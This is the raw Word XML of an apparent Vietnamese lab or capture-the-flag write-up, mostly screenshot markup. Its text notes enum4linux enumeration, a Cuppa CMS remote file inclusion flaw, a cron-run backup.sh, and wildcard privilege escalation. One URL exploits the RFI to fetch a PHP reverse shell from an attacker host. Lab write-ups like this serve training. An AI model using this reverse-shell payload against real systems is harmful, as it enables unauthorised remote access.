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FC4CD0" w14:textId="307E0DA1" w:rsidR="002F49FE" w:rsidRDefault="00735C3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65808386" wp14:editId="26943914">
            <wp:extent cx="5604907" cy="288209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068" cy="28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9CB2" w14:textId="46D1563E" w:rsidR="009853DE" w:rsidRDefault="009853DE"/>
    <w:p w14:paraId="67E672D8" w14:textId="63EF2264" w:rsidR="009853DE" w:rsidRPr="009853DE" w:rsidRDefault="009853DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enum4linux -a 10.10.71.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA0788" w14:textId="3CFD14EB" w:rsidR="009853DE" w:rsidRDefault="009853DE"/>
    <w:p w14:paraId="54183EA8" w14:textId="2A380BB7" w:rsidR="009853DE" w:rsidRDefault="009853DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C57D12F" wp14:editId="3BE447F6">
            <wp:extent cx="4907666" cy="2708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2013" cy="27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63AAE" w14:textId="2CA5FED4" w:rsidR="00D83BDC" w:rsidRDefault="00D83BDC"/>
    <w:p w14:paraId="772DC7C8" w14:textId="18EFA3FC" w:rsidR="00D83BDC" w:rsidRDefault="00D83BDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5EE075" wp14:editId="38637282">
            <wp:extent cx="5116010" cy="1254406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2316" cy="126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2CA7F" w14:textId="1ACF3CB6" w:rsidR="00AF6671" w:rsidRDefault="00AF6671"/>
    <w:p w14:paraId="1B58CC0A" w14:textId="77777777" w:rsidR="00AF6671" w:rsidRDefault="00AF6671"/>
    <w:p w14:paraId="6AB9EE6C" w14:textId="4116EC5D" w:rsidR="00AF6671" w:rsidRDefault="00AF6671">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27768B3F" wp14:editId="72007D1D">
            <wp:extent cx="4780344" cy="2633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8874" cy="2643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B5D5" w14:textId="77777777" w:rsidR="00AF6671" w:rsidRDefault="00AF6671"/>
    <w:p w14:paraId="7DC54B26" w14:textId="14E0EF70" w:rsidR="00080EE7" w:rsidRDefault="00080EE7"/>
    <w:p w14:paraId="144E4E44" w14:textId="1750FCAE" w:rsidR="00080EE7" w:rsidRDefault="00080EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7997D4FC" wp14:editId="1BA6C15E">
            <wp:extent cx="5943600" cy="737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6160" w14:textId="58766243" w:rsidR="00322455" w:rsidRDefault="00322455"/>
    <w:p w14:paraId="50A47BA1" w14:textId="77777777" w:rsidR="00322455" w:rsidRDefault="00322455"/>
    <w:p w14:paraId="2CF8D1DB" w14:textId="70C739DB" w:rsidR="00D83BDC" w:rsidRDefault="00322455">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26036A84" wp14:editId="174433B5">
            <wp:extent cx="2495133" cy="36460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913" cy="365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FCAB" w14:textId="64DB3BF8" w:rsidR="00FD7ED3" w:rsidRDefault="00080EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4A3E57" wp14:editId="4C35BEBA">
            <wp:extent cx="5357296" cy="2650603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477" cy="26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87FF8" w14:textId="77777777" w:rsidR="00B6618D" w:rsidRDefault="00B6618D"/>
    <w:p w14:paraId="2D9A58AA" w14:textId="0BF3AF4C" w:rsidR="00274F26" w:rsidRDefault="00FD7ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B20D62" wp14:editId="0CCDB5A1">
            <wp:extent cx="3931209" cy="179407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3" t="12153" r="25998" b="37509"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3936608" cy="1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98BEC5" w14:textId="77777777" w:rsidR="00B6618D" w:rsidRDefault="00B6618D"/>
    <w:p w14:paraId="0EB49ED9" w14:textId="15862877" w:rsidR="00274F26" w:rsidRDefault="00976E09">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F7CFE30" wp14:editId="3C0AC317">
            <wp:extent cx="4459760" cy="334508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72"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4486812" cy="336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B1640" w14:textId="502D03F9" w:rsidR="00AA38B1" w:rsidRDefault="00AA38B1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC86391" wp14:editId="267E6FB8">
            <wp:extent cx="5197033" cy="2555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4" t="12156" r="25998" b="33310"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5221574" cy="256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E42F1" w14:textId="5A5B0F6F" w:rsidR="00F9287F" w:rsidRDefault="00F9287F"/>
    <w:p w14:paraId="726C0723" w14:textId="5484683D" w:rsidR="00F9287F" w:rsidRDefault="00F9287F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C29B80D" wp14:editId="000743C1">
            <wp:extent cx="5058137" cy="3716950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22" t="8104" r="19759" b="35791"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5085525" cy="373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D80E" w14:textId="6D309781" w:rsidR="00C80256" w:rsidRDefault="00C80256"/>
    <w:p w14:paraId="7C312AF8" w14:textId="77777777" w:rsidR="00C80256" w:rsidRDefault="00C80256"/>
    <w:p w14:paraId="382944C8" w14:textId="22408D17" w:rsidR="00193FA3" w:rsidRDefault="00193FA3"/>
    <w:p w14:paraId="21717C6E" w14:textId="77777777" w:rsidR="00193FA3" w:rsidRDefault="00193FA3"/>
    <w:p w14:paraId="46FFE7E5" w14:textId="18AF4279" w:rsidR="00AA38B1" w:rsidRDefault="00C80256">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418352AD" wp14:editId="5FA25D28">
            <wp:extent cx="5046562" cy="2700126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3811" cy="27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126A" w14:textId="18E1AEA8" w:rsidR="008D058D" w:rsidRDefault="008D058D"/>
    <w:p w14:paraId="24F62B7D" w14:textId="7D835328" w:rsidR="008D058D" w:rsidRDefault="0045044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D7241C8" wp14:editId="7848020B">
            <wp:extent cx="4224759" cy="4126918"/>
            <wp:effectExtent l="0" t="0" r="444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02" r="35345" b="22083"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4247728" cy="414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2CC7" w14:textId="3134A2E3" w:rsidR="00450441" w:rsidRDefault="00450441">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B59BB13" w14:textId="02951C16" w:rsidR="00450441" w:rsidRDefault="0045044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kiếm lỗ hổng RFI liên quan đến Cuppa CMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6331C3" w14:textId="5178E167" w:rsidR="00450441" w:rsidRDefault="00450441">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256C1BEA" w14:textId="6163D333" w:rsidR="00450441" w:rsidRDefault="0045044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Reverse Shell:</w:t>
      </w:r>
      <w:r w:rsidR="00991D39">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC8A28" w14:textId="01ACF1FC" w:rsidR="00450441" w:rsidRDefault="00450441">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CBEEAB" w14:textId="2E6D49D5" w:rsidR="00450441" w:rsidRDefault="00450441">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450441">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://10.10.71.52/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.55.148:8000/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B646B3" w14:textId="38C2FE18" w:rsidR="0019185F" w:rsidRDefault="0019185F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9AB9FC" w14:textId="72C67591" w:rsidR="0019185F" w:rsidRDefault="0019185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EDAC7B" wp14:editId="2E37A5D3">
            <wp:extent cx="5636871" cy="1424273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978" cy="142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93296" w14:textId="0A368886" w:rsidR="00997DCD" w:rsidRDefault="00997DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692042F6" w14:textId="45BF7F5E" w:rsidR="00997DCD" w:rsidRDefault="00997DC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2FC636D" wp14:editId="001B5498">
            <wp:extent cx="2946400" cy="1460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4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07D2" w14:textId="56E6F8DA" w:rsidR="00B957F6" w:rsidRDefault="00B957F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E59CCE" w14:textId="208BD332" w:rsidR="00B957F6" w:rsidRDefault="00B957F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Lệnh sudo -l không chạy được vì không có mật khẩu của ông www-data</w:t>
      </w:r>
      <w:r w:rsidR="000D159C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31F484" w14:textId="2A7E2D24" w:rsidR="000D159C" w:rsidRDefault="000D159C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459698F7" w14:textId="1B0BAACA" w:rsidR="000D159C" w:rsidRDefault="00A83F2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383914" wp14:editId="40BA9612">
            <wp:extent cx="5943600" cy="19977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BC5C" w14:textId="097DD903" w:rsidR="00564C12" w:rsidRDefault="00564C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFAF56C" w14:textId="0F28D8B3" w:rsidR="00564C12" w:rsidRDefault="00564C1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Root chạy backup.sh mỗi phút</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E15E2" w14:textId="106A4430" w:rsidR="00564C12" w:rsidRDefault="00564C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C6AB0B" w14:textId="5168C8BE" w:rsidR="00564C12" w:rsidRDefault="00564C1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86D950" wp14:editId="308106E3">
            <wp:extent cx="4305300" cy="787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F265" w14:textId="1904F093" w:rsidR="00CD3497" w:rsidRDefault="00CD3497">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8DEFBF" w14:textId="06C4B848" w:rsidR="00CD3497" w:rsidRDefault="00CD34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Root muốn backup toàn bộ ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE521C" w14:textId="4300DF9A" w:rsidR="00CD3497" w:rsidRDefault="00CD3497">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138EF236" w14:textId="6721D4EF" w:rsidR="00CD3497" w:rsidRPr="00E05B43" w:rsidRDefault="00CD3497">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E05B43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khai thác Wildcard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2BA21" w14:textId="55DB4DA4" w:rsidR="00CD3497" w:rsidRDefault="00CD3497">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593E7B9F" w14:textId="14A16683" w:rsidR="00CD3497" w:rsidRDefault="00991D3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F3BFD7" wp14:editId="088C979F">
            <wp:extent cx="4508500" cy="393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6877" w14:textId="7E8C0187" w:rsidR="00506485" w:rsidRDefault="00506485">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C239925" w14:textId="1CE7855D" w:rsidR="00506485" w:rsidRDefault="0050648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27E6FE5" wp14:editId="335F0586">
            <wp:extent cx="4660900" cy="19612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785"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4660900" cy="196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0737" w14:textId="44C5BF4B" w:rsidR="0020248B" w:rsidRDefault="0020248B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714872E4" w14:textId="29888CBC" w:rsidR="0020248B" w:rsidRPr="008D058D" w:rsidRDefault="00F16A6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68BDAF1" wp14:editId="3C523C00">
            <wp:extent cx="4876800" cy="1828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248B" w:rsidRPr="008D058D" w:rsidSect="00B6618D">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="136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2F8"/>
    <w:rsid w:val="00080EE7"/>
    <w:rsid w:val="000D159C"/>
    <w:rsid w:val="0019185F"/>
    <w:rsid w:val="00193FA3"/>
    <w:rsid w:val="0020248B"/>
    <w:rsid w:val="00274F26"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00322455"/>
    <w:rsid w:val="00450441"/>
    <w:rsid w:val="00506485"/>
    <w:rsid w:val="00564C12"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00735C3D"/>
    <w:rsid w:val="008342F8"/>
    <w:rsid w:val="008D058D"/>
    <w:rsid w:val="00976E09"/>
    <w:rsid w:val="009853DE"/>
    <w:rsid w:val="00991D39"/>
    <w:rsid w:val="00997DCD"/>
    <w:rsid w:val="00A83F2F"/>
    <w:rsid w:val="00AA38B1"/>
    <w:rsid w:val="00AF6671"/>
    <w:rsid w:val="00B6618D"/>
    <w:rsid w:val="00B957F6"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C80256"/>
    <w:rsid w:val="00CD3497"/>
    <w:rsid w:val="00D83BDC"/>
    <w:rsid w:val="00E05B43"/>
    <w:rsid w:val="00F16A6E"/>
    <w:rsid w:val="00F9287F"/>
    <w:rsid w:val="00FD7E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42B5CAC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50A0ADC1-3005-B747-9FEF-DF4294761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7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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-18T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-18T14:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>